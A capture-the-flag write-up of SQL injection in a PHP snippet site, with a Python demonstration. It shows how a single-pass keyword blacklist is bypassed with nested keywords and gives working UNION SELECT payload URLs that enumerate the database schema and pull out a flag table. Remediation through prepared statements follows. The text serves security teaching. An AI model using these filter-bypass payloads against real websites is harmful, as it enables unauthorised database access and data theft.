Vulnerability analysis

The tadasnippets application maintains a database of code snippets. It lets the user view existing code snippets (with view.php?name=...) and add a new code snippet to the database (with index.php and some POST parameters).

The SELECT query performed by the view.php page is vulnerable to SQL injection through the GET parameter "name". We can confirm the vulnerability by requesting:

view.php?name=doesntexist'+OR+1=1+--+

and checking that the site returns the first snippet in the database instead of nothing: the injected OR 1=1 makes the WHERE clause true for every row, and the page displays the first row it fetches.

The "name" parameter is ineffectively protected by a string-based blacklist filter that strips the substrings "select" and "union" in a case-insensitive fashion. Because the stripping is done in a single pass, removing one copy of a keyword can leave another copy of the same keyword behind.

Exploitation

We can bypass the filter by injecting camouflaged SQL keywords such as "ununionion" and "selselectect": the filter removes the inner "union" and "select", and the surrounding characters rejoin into the original keyword. By analyzing the PHP code of view.php, we see that the query returns a single column (so our UNION SELECT must also return exactly one column), and that the schema name is "tadasnippets".

First, we have to discover the structure of the database by injecting:

view.php?name=doesntexist'+ununionion+selselectect+table_name+from+information_schema.columns+where+table_schema%3d'tadasnippets'+limit+0,1+--+

Since the page shows only one row at a time, we cycle through "limit+0,1", "limit+1,1", etc. to enumerate all the table names of the tadasnippets schema. (information_schema.columns yields one row per column, so each table name repeats once per column; information_schema.tables would list each table once, but either works.) Eventually, we find a suspicious table named "hugesecret". We discover the names of its columns with:

view.php?name=doesntexist'+ununionion+selselectect+column_name+from+information_schema.columns+where+table_schema%3d'tadasnippets'+and+table_name%3d'hugesecret'+limit+0,1+--+

We find a column named "flag". Finally, we retrieve the flag with:

view.php?name=doesntexist'+ununionion+selselectect+flag+from+hugesecret+--+

The flag is: SNH{drumroll...TA-DA!_the_flag!}

Remediation

The main remediation is to replace the insecure stripping filter in view.php with a prepared statement that binds $name as a parameter, so that the user input is never parsed as SQL. Escaping $name with mysqli_real_escape_string() before concatenating it into the query also closes this particular hole, but it only helps when the value lands inside a quoted string literal, so prepared statements are the preferred fix. A keyword blacklist should not be relied on at all: as shown above, it is trivially bypassed.
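The filter bypass and the remediation, as an added example that is not part of the original writeup: this Python script emulates the view.php blacklist (assumed to be a single-pass, case-insensitive removal of "select" and "union", str_ireplace-style), builds the camouflaged payloads, and runs the vulnerable string-concatenated query next to a parameterized one against a constructed in-memory SQLite database. SQLite stands in for MySQL, so the information_schema enumeration payloads are only generated, not executed; the table "snippets" and its columns "name" and "snippet" are assumptions, while "hugesecret" and "flag" are the names from the writeup.

```python
import re
import sqlite3

# Emulation of the blacklist in view.php. Assumption: the real filter is a
# single-pass, case-insensitive removal of the substrings "select" and
# "union". A single pass is exactly why it is bypassable: deleting the inner
# keyword from "ununionion" leaves "union" behind.
BLACKLIST = re.compile(r"select|union", re.IGNORECASE)


def strip_filter(name: str) -> str:
    """Return `name` with every 'select'/'union' substring removed once."""
    return BLACKLIST.sub("", name)


def camouflage(keyword: str) -> str:
    """Build a word that turns back into `keyword` after one stripping pass.

    Wrapping the keyword around a copy of itself, split at the midpoint,
    gives 'union' -> 'ununionion' and 'select' -> 'selselectect'.
    """
    half = len(keyword) // 2
    return keyword[:half] + keyword + keyword[half:]


def url_param(value: str) -> str:
    """Encode the payload the way the writeup does: spaces as '+', '=' as %3d."""
    return value.replace("=", "%3d").replace(" ", "+")


def table_payload(schema: str, offset: int) -> str:
    """Value for view.php?name= that leaks the table name at `offset` (MySQL)."""
    raw = (
        f"doesntexist' {camouflage('union')} {camouflage('select')} table_name "
        f"from information_schema.columns where table_schema='{schema}' "
        f"limit {offset},1 -- "
    )
    return url_param(raw)


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the tadasnippets schema (SQLite in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE snippets (name TEXT PRIMARY KEY, snippet TEXT);
        INSERT INTO snippets VALUES ('hello', 'print("hello")');
        INSERT INTO snippets VALUES ('loop', 'for i in range(3): pass');
        CREATE TABLE hugesecret (flag TEXT);
        INSERT INTO hugesecret VALUES ('SNH{drumroll...TA-DA!_the_flag!}');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, name: str) -> list:
    """What view.php does: filter the value, then splice it into the SQL text."""
    sql = f"SELECT snippet FROM snippets WHERE name = '{strip_filter(name)}'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, name: str) -> list:
    """Remediated lookup: the value is bound as a parameter, never parsed as SQL."""
    sql = "SELECT snippet FROM snippets WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


# Payloads from the writeup, with '+' already decoded to spaces.
CONFIRM_PAYLOAD = "doesntexist' OR 1=1 -- "
FLAG_PAYLOAD = (
    f"doesntexist' {camouflage('union')} {camouflage('select')} "
    "flag from hugesecret -- "
)


def demo() -> dict:
    """Run every payload against both lookups and collect the results."""
    conn = build_db()
    return {
        "confirm": vulnerable_lookup(conn, CONFIRM_PAYLOAD),      # every snippet
        "exploit": vulnerable_lookup(conn, FLAG_PAYLOAD),         # the flag
        "remediated": safe_lookup(conn, FLAG_PAYLOAD),            # nothing
        "remediated_legit": safe_lookup(conn, "hello"),           # still works
    }


if __name__ == "__main__":
    print("enumeration payload:", table_payload("tadasnippets", 0))
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the parameterized version is that the bound value is handed to the database engine as data, so the reconstituted "union select" is compared against the name column rather than executed; no blacklist is needed for that, and the legitimate lookup keeps working.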